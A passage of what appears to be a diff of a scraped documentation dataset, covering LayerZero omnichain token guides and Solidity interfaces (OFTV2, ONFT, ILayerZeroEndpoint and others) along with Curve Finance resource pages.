"https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oftv2", + "body": "OFTV2 Omnichain Fungible Token that supports both EVMs and non EVMs OFTV2.sol solidity-examples/OFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFTV2.sol Use this extension when you want to turn an already deployed ERC20 into an OFTV2. You can then deploy OFTV2 contracts on the LayerZero-supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFTV2 and mint on the destination chain. When you come back to the ProxyOFTV2 chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFTV2.sol at main LayerZero-Labs/solidity-examples GitHub How to deploy ProxyOFT and OFT Contracts 1. Deploy your ProxyOFT contract using your ERC-20 address, and specify the shared decimals (ie. where your ERC-20 decimals > shared-decimals). 2. Deploy your OFT contract on the other connected chain(s) and specify the shared decimals in relation to your ERC-20 & ProxyOFT. 3. Set your contracts to trust one another using setTrustedRemoteAddress. Pair them to one another's chain and address. 4. Next, we're going to set our minimum Gas Limit for each chain. (Recommended 200k for all EVM chains except Arbitrum, 2M for Arbitrum). Call setMinDstGas with the chainId of the other chain, the packet type (\"0\" meaning send, \"1\" meaning send and call), and the gas limit amount. (Make sure that your AdapterParams gas limit > setMinDstGas) If providedGasLimit >= minGasLimit , it'd fail: \"LZApp: gas limit is too low\" , where providedGasLimit is _getGasLimit ( provided in _adapterParams ) and minGasLimit is minDstGasLimit FAQ If I only have tokens on EVM chains, can I use V2? Yes, you can, just make sure to set shared decimals as <= 10 if your token decimals are 18. What is shared decimals? Shared Decimals is used to normalize the data type difference across EVM chain and non-Evm. Non-evm chains often has a Uint64 data type which limits the decimals of the token to a lower amount. Shared Decimals accounts for this and translates the higher decimals of EVM to lower decimals of non-evm. What should I set as shared decimals? If your token is deployed on non-evm chains, it should be set as the lowest decimals across all chains. For example, if your token is deployed on Aptos as decimal 6 and your Ethereum token is deployed as decimal 18. Shared Decimals should be set as 6. If your tokens are only deployed on EVM chains and all have decimals larger than 8, it should be set as 8. For example, your tokens on all EVM chains have decimals of 18, the shared decimals on all chains should be set as 8. shared decimals should be set lower than 8 if you want a larger maximum send amount. Check below. How does shared decimals affect my OFT? It affects the minimum and maximum tokens you can send cross-chain. The minimum tokens you can send: 10 * ( 10^( decimals - _sharedDecimals)) The maximum tokens you can send: 18,446,744,073,709,551,615 * ( 10^( decimals - _sharedDecimals)) Previous OFT (V1) Next ONFT Last modified 1d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroRelayer.sol", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerorelayer.sol", - "body": "ILayerZeroRelayer.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroRelayer { // @notice query the relayer price for relaying the payload and its proof to the destination chain // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify proof to be relayed // @param _userApplication - the source sending contract address. relayers may apply price discrimination to user apps // @param _payloadSize - the length of the payload. it is an indicator of gas usage for relaying cross-chain messages // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function getPrice ( uint16 _dstChainId , uint16 _outboundProofType , address _userApplication , uint _payloadSize , bytes calldata _adapterParams ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify the data to be relayed // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function notifyRelayer ( uint16 _dstChainId , uint16 _outboundProofType , bytes calldata _adapterParams ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address - the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroOracle.sol Next - EVM Guides Error Messages Last modified 3mo ago", + "title": "1155", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/1155", + "body": "1155 Omnichain NonFungible Token (ONFT1155) ONFT1155.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft1155/ONFT1155.sol Extensions ProxyONFT1155.sol Use this extension when you want to turn an already deployed ERC1155 into an ONFT1155. You can then deploy ONFT1155 contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT1155 from the source chain the ONFT1155 will lock in the ProxyONFT1155 and mint on the destination chain. When you come back to the ProxyONFT1155 chain the ONFT1155 burns on the source chain and unlocks on the destination chain. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft1155/ProxyONFT1155.sol Previous 721 Next - EVM Guides LayerZero Integration Checklist Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroUserApplicationConfig", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerouserapplicationconfig", - "body": "ILayerZeroUserApplicationConfig ILayerZeroUserApplicationConfig.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroUserApplicationConfig { // @notice set the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _configType - type of configuration. every messaging library has its own convention. // @param _config - configuration in the bytes. can encode arbitrary content. function setConfig ( uint16 _version , uint16 _chainId , uint _configType , bytes calldata _config ) external ; // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice Only when the UA needs to resume the message flow in blocking mode and clear the stored payload // @param _srcChainId - the chainId of the source chain // @param _srcAddress - the contract address of the source contract at the source chain function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external ; } Previous ILayerZeroMessagingLibrary Next ILayerZeroOracle.sol Last modified 3mo ago", + "title": "721", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/721", + "body": "721 Omnichain NonFungible Token (ONFT721) ONFT721.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft721/ONFT721.sol Extensions ProxyONFT721.sol Use this extension when you want to turn an already deployed ERC721 into an ONFT721. You can then deploy ONFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT from the source chain the ONFT will lock in the ProxyONFT721 and mint on the destination chain. When you come back to the ProxyONFT721 chain the ONFT locks on the source chain and unlocks on the destination chain. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft721/ProxyONFT721.sol Previous ONFT Next 1155 Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "IERC165 OFT Interface Ids", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/ierc165-oft-interface-ids", - "body": "IERC165 OFT Interface Ids Use these interface ids to determine which version of OFT is deployed. OFT(v1): 0x14e4ceea OFTV2: 0x1f7ecdf7 OFTWithFee: 0x6984a9e8 interface ERC165 { /// @notice Query if a contract implements an interface /// @param interfaceID The interface identifier, as specified in ERC-165 /// @dev Interface identification is specified in ERC-165. This function /// uses less than 30,000 gas. /// @return `true` if the contract implements `interfaceID` and /// `interfaceID` is not 0xffffffff, `false` otherwise function supportsInterface(bytes4 interfaceID) external view returns (bool); } Example Hardhat Task module . exports = async function ( taskArgs ) { const OFTInterfaceId = 0x14e4ceea ; const OFTV2InterfaceId = 0x1f7ecdf7 ; const OFTWithFeeInterfaceId = 0x6984a9e8 ; const ERC165ABI = [ \"function supportsInterface(bytes4) public view returns (bool)\" ]; try { const contract = await ethers . getContractAt ( ERC165ABI , taskArgs . address ); const isOFT = await contract . supportsInterface ( OFTInterfaceId ); const isOFTV2 = await contract . supportsInterface ( OFTV2InterfaceId ); const isOFTWithFee = await contract . supportsInterface ( OFTWithFeeInterfaceId ); if ( isOFT ) { console . log ( ` address: ${ taskArgs . address } is OFT(v1) ` ) } else if ( isOFTV2 ) { console . log ( ` address: ${ taskArgs . address } is OFTV2 ` ) } else if ( isOFTWithFee ) { console . log ( ` address: ${ taskArgs . address } is OFTWithFee ` ) } else { console . log ( ` address: ${ taskArgs . address } is not an OFT ` ) } } catch ( e ) { console . log ( \"supportsInterface not implemented\" ) } } Previous OFT Next OFT (V1) vs OFTV2 - Which should I use? Last modified 2mo ago", + "title": "ILayerZeroEndpoint", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeroendpoint", + "body": "ILayerZeroEndpoint // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroEndpoint is ILayerZeroUserApplicationConfig { // @notice send a LayerZero message to the specified address at a LayerZero endpoint. // @param _dstChainId - the destination chain identifier // @param _destination - the address on destination chain (in bytes). address length/format may vary by chains // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _destination , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // @notice used by the messaging library to publish verified payload // @param _srcChainId - the source chain identifier // @param _srcAddress - the source contract (as bytes) at the source chain // @param _dstAddress - the address on destination chain // @param _nonce - the unbound message ordering nonce // @param _gasLimit - the gas limit for external contract execution // @param _payload - verified payload to send to the destination contract function receivePayload ( uint16 _srcChainId , bytes calldata _srcAddress , address _dstAddress , uint64 _nonce , uint _gasLimit , bytes calldata _payload ) external ; // @notice get the inboundNonce of a receiver from a source chain which could be EVM or non-EVM chain // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function getInboundNonce ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( uint64 ); // @notice get the outboundNonce from this source chain which, consequently, is always an EVM // @param _srcAddress - the source chain contract address function getOutboundNonce ( uint16 _dstChainId , address _srcAddress ) external view returns ( uint64 ); // @notice gets a quote in source native gas, for the amount that send() requires to pay for message delivery // @param _dstChainId - the destination chain identifier // @param _userApplication - the user app address on this EVM chain // @param _payload - the custom message to send over LayerZero // @param _payInZRO - if false, user app pays the protocol fee in native token // @param _adapterParam - parameters for the adapter service, e.g. send some dust native token to dstChain function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); // @notice get this Endpoint's immutable source identifier function getChainId () external view returns ( uint16 ); // @notice the interface to retry failed message on this Endpoint destination // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address // @param _payload - the payload to be retried function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external ; // @notice query if any STORED payload (message blocking) at the endpoint. // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( bool ); // @notice query if the _libraryAddress is valid for sending msgs. // @param _userApplication - the user app address on this EVM chain function getSendLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the _libraryAddress is valid for receiving msgs. // @param _userApplication - the user app address on this EVM chain function getReceiveLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the non-reentrancy guard for send() is on // @return true if the guard is on. false otherwise function isSendingPayload () external view returns ( bool ); // @notice query if the non-reentrancy guard for receive() is on // @return true if the guard is on. false otherwise function isReceivingPayload () external view returns ( bool ); // @notice get the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _userApplication - the contract address of the user application // @param _configType - type of configuration. every messaging library has its own convention. function getConfig ( uint16 _version , uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ); } Previous ILayerZeroReceiver Next ILayerZeroMessagingLibrary Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFT (V1)", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1", - "body": "OFT (V1) Omnichain Fungible Token standard written to support EVM chains only. OFT.sol solidity-examples/OFT.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFT.sol Use this extension when you want to turn an already deployed ERC20 into an OFT. You can then deploy OFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFT and mint on the destination chain. When you come back to the ProxyOFT chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFT.sol at main LayerZero-Labs/solidity-examples GitHub Previous OFT (V1) vs OFTV2 - Which should I use? Next OFTV2 Last modified 7mo ago", + "title": "ILayerZeroMessagingLibrary", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeromessaginglibrary", + "body": "ILayerZeroMessagingLibrary // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroMessagingLibrary { // send(), messages will be inflight. function send ( address _userApplication , uint64 _lastNonce , uint16 _chainId , bytes calldata _destination , bytes calldata _payload , address payable refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // estimate native fee at the send side function estimateFees ( uint16 _chainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); //--------------------------------------------------------------------------- // setConfig / getConfig are User Application (UA) functions to specify Oracle, Relayer, blockConfirmations, libraryVersion function setConfig ( uint16 _chainId , address _userApplication , uint _configType , bytes calldata _config ) external ; function getConfig ( uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); } Previous ILayerZeroEndpoint Next ILayerZeroUserApplicationConfig Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFT (V1) vs OFTV2 - Which should I use?", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1-vs-oftv2-which-should-i-use", - "body": "OFT (V1) vs OFTV2 - Which should I use? This page explains the differences between OFT/OFTV2 and when to use each one. When to use OFT (v1) Our Omnichain Fungible Token (OFT) was our first implementation of our standard. This OFT was first used in projects such as Stargate's token. The standard was written to support EVM chains only. If you are looking to only support EVMs now and forever then OFT (V1) is for you. When to use OFTV2 What if you want to build an Omnichain Fungible Token that supports EVMs and non EVMs (eg. Aptos)? In this case you should use our OFTV2 which supports both. This version has fees, shared decimals, and composability built in. This version of OFTV2 is currently being used in projects such as BTCb . What are the differences between the two versions? The main difference between the two versions comes from the limitations of the Non EVMs. Non EVM chains such as Aptos/Solana use Uint64 to represent balance. To account for this, OFTV2 uses Shared Decimals for value transfers to normalize the data type difference. It is recommended to use a smaller shared decimal point on all chains so that your token can have a larger balance. For example, if the decimal point is 18, then you can not have more than approximately 18 * 10^18 tokens bounded by the uint64.max. OFTV2 is intended to be used with no more than 10 shared decimals Previous IERC165 OFT Interface Ids Next OFT (V1) Last modified 7mo ago", + "title": "ILayerZeroOracle.sol", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerooracle.sol", + "body": "ILayerZeroOracle.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroOracle { // @notice query the oracle price for relaying block information to the destination chain // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed function getPrice ( uint16 _dstChainId , uint16 _outboundProofType ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed // @param _outboundBlockConfirmations the number of source chain block confirmation needed function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroUserApplicationConfig Next ILayerZeroRelayer.sol Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFTV2", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oftv2", - "body": "OFTV2 Omnichain Fungible Token that supports both EVMs and non EVMs OFTV2.sol solidity-examples/OFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFTV2.sol Use this extension when you want to turn an already deployed ERC20 into an OFTV2. You can then deploy OFTV2 contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFTV2 and mint on the destination chain. When you come back to the ProxyOFTV2 chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Previous OFT (V1) Next ONFT Last modified 7mo ago", + "title": "ILayerZeroReceiver", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeroreceiver", + "body": "ILayerZeroReceiver For User Application contracts to receive messages! // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } This is a core interface for contract to implement so they can receive LayerZero messages! See the CounterMock example for usage Previous EVM (Solidity) Interfaces Next ILayerZeroEndpoint Last modified 4mo ago", "labels": [ "Documentation" ] }, { - "title": "1155", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/1155", - "body": "1155 Omnichain NonFungible Token (ONFT1155) ONFT1155.sol solidity-examples/ONFT1155.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyONFT1155.sol Use this extension when you want to turn an already deployed ERC1155 into an ONFT1155. You can then deploy ONFT1155 contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT1155 from the source chain the ONFT1155 will lock in the ProxyONFT1155 and mint on the destination chain. When you come back to the ProxyONFT1155 chain the ONFT1155 burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyONFT1155.sol at main LayerZero-Labs/solidity-examples GitHub Previous 721 Next - EVM Guides LayerZero Integration Checklist Last modified 7mo ago", + "title": "ILayerZeroRelayer.sol", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerorelayer.sol", + "body": "ILayerZeroRelayer.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroRelayer { // @notice query the relayer price for relaying the payload and its proof to the destination chain // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify proof to be relayed // @param _userApplication - the source sending contract address. relayers may apply price discrimination to user apps // @param _payloadSize - the length of the payload. it is an indicator of gas usage for relaying cross-chain messages // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function getPrice ( uint16 _dstChainId , uint16 _outboundProofType , address _userApplication , uint _payloadSize , bytes calldata _adapterParams ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify the data to be relayed // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function notifyRelayer ( uint16 _dstChainId , uint16 _outboundProofType , bytes calldata _adapterParams ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address - the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroOracle.sol Next - Technical Reference LayerZero Interfaces Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "721", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/721", - "body": "721 Omnichain NonFungible Token (ONFT721) ONFT721.sol solidity-examples/ONFT721.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyONFT721.sol Use this extension when you want to turn an already deployed ERC721 into an ONFT721. You can then deploy ONFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT from the source chain the ONFT will lock in the ProxyONFT721 and mint on the destination chain. When you come back to the ProxyONFT721 chain the ONFT locks on the source chain and unlocks on the destination chain. solidity-examples/ProxyONFT721.sol at main LayerZero-Labs/solidity-examples GitHub Previous ONFT Next 1155 Last modified 7mo ago", + "title": "ILayerZeroUserApplicationConfig", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerouserapplicationconfig", + "body": "ILayerZeroUserApplicationConfig ILayerZeroUserApplicationConfig.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroUserApplicationConfig { // @notice set the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _configType - type of configuration. every messaging library has its own convention. // @param _config - configuration in the bytes. can encode arbitrary content. function setConfig ( uint16 _version , uint16 _chainId , uint _configType , bytes calldata _config ) external ; // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice Only when the UA needs to resume the message flow in blocking mode and clear the stored payload // @param _srcChainId - the chainId of the source chain // @param _srcAddress - the contract address of the source contract at the source chain function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external ; } Previous ILayerZeroMessagingLibrary Next ILayerZeroOracle.sol Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "Home", + "title": " ", "html_url": "https://resources.curve.fi/", - "body": "Curve Resources CurveDocs/curve-resources Home Home Table of contents Welcome to Curve Finance Sections Useful links Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Welcome to Curve Finance Sections Useful links Home Welcome to Curve Finance Resources and guides to get started with Curve and the Curve DAO Curve's Logo, a colorized Klein Bottle Curve is DeFi's leading AMM , (Automated Market Maker). Hundreds of liquidity pools have been launched through Curve's factory and incentivized by Curve's DAO. Users rely on Curve's proprietary formulas to provide high liquidity, low slippage, and low fee transactions among ERC-20 tokens. Those resources aim to help new and existing users to become familiar with the Curve protocol , the Curve DAO , and the $CRV token . Sections Getting Started with Curve v1 and Curve v2 $CRV Token : Tokenomics, Staking, Claiming Fees Liquidity Providers : Curve Pools, MetaPools, Depositing Reward Gauges : Boosting, Gauge Weights Stablecoin : crvUSD, Soft Liquidation, Bands Governance : Vote Locking, Voting, Snapshot, Proposals Multichain : Bridging, Fantom, Polygon, etc. Creating Pools : Factory Pools, Crypto Factory Pools Troubleshooting : Cross-Asset Swaps, Wallets, Stuck Transactions Useful links Governance dashboard: http://dao.curve.fi/ Governance forum: https://gov.curve.fi/ Telegram: https://t.me/curvefi Twitter: https://twitter.com/curvefinance Discord: https://discord.gg/rgrfS7W Youtube Channel: http://www.youtube.com/c/CurveFinance Technical Docs: https://curve.readthedocs.io Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Home Table of contents Welcome to Curve Finance Sections Useful links Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Welcome to Curve Finance Sections Useful links Welcome to Curve Finance Resources and guides to get started with Curve and the Curve DAO Curve's Logo, a colorized Klein Bottle Curve is DeFi's leading AMM , (Automated Market Maker). Hundreds of liquidity pools have been launched through Curve's factory and incentivized by Curve's DAO. Users rely on Curve's proprietary formulas to provide high liquidity, low slippage, and low fee transactions among ERC-20 tokens. Those resources aim to help new and existing users to become familiar with the Curve protocol , the Curve DAO , and the $CRV token . Sections Getting Started with Curve v1 and Curve v2 $CRV Token : Tokenomics, Staking, Claiming Fees Liquidity Providers : Curve Pools, MetaPools, Depositing Reward Gauges : Boosting, Gauge Weights, Set Any Token Rewards Stablecoin : crvUSD, Soft Liquidation, Bands Governance : Vote Locking, Voting, Snapshot, Proposals Multichain : Bridging, Fantom, Polygon, etc. Creating Pools : Factory Pools, Crypto Factory Pools Troubleshooting : Cross-Asset Swaps, Wallets, Stuck Transactions Useful links Governance dashboard: http://dao.curve.fi/ Governance forum: https://gov.curve.fi/ Telegram: https://t.me/curvefi Twitter: https://twitter.com/curvefinance Discord: https://discord.gg/rgrfS7W Youtube Channel: http://www.youtube.com/c/CurveFinance Technical Docs: https://curve.readthedocs.io 2023-10-04 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crypto pools", + "title": "Understanding CryptoPools (v2)", "html_url": "https://resources.curve.fi/base-features/understanding-crypto-pools/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools Understanding crypto pools Table of contents Understanding Curve v2 Whitepaper Liquidity Providers Fees Risks $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Curve v2 Whitepaper Liquidity Providers Fees Risks Understanding crypto pools Understanding Curve v2 Crypto pools are Curve pools holding assets with different prices. Curve core originally was pegged assets but a new type of AMM allows for extremely efficient trading and low risks of non-pegged assets. Crypto pools use liquidity more effectively by concentrating it at current prices. As trades happen, the pool readjusts its internal price to the highest liquidity region without creating losses for the pool. Crypto pools also have variable fees which can range between 0.04% and 0.40%. Tricrypto , the first and main base pool has the following coins: USDT/WBTC/WETH for Ethereum. On Polygon, the first pool has AAVE tokens and can handle swaps with the following tokens: DAI/USDC/USDT/ETH/WBTC. Whitepaper Read the v2 whitepaper by clicking here . Liquidity Providers Becoming a liquidity provider in a Curve Crypto pool is in all ways similar to stable pools. You will gain exposure and risks to all assets in the pools. You can deposit one or all the coins in the pool. Always be sure to check the bonus/slippage warning box. Fees Fees on those pool range from 0.04% to 0.4%. The current fee varies based on how close the price is from the internal oracle. You can check a pool's current fee which changes every trade on the bottom of a pool page. Risks As with any liquidity providing in blockchain, there are some smart contract risks involved. Curve crypto pools have been audited by MixBytes and ChainSecurity but audits never eliminate risks completely. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) Understanding CryptoPools (v2) Table of contents Whitepaper Liquidity Providers Fees Risks $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan 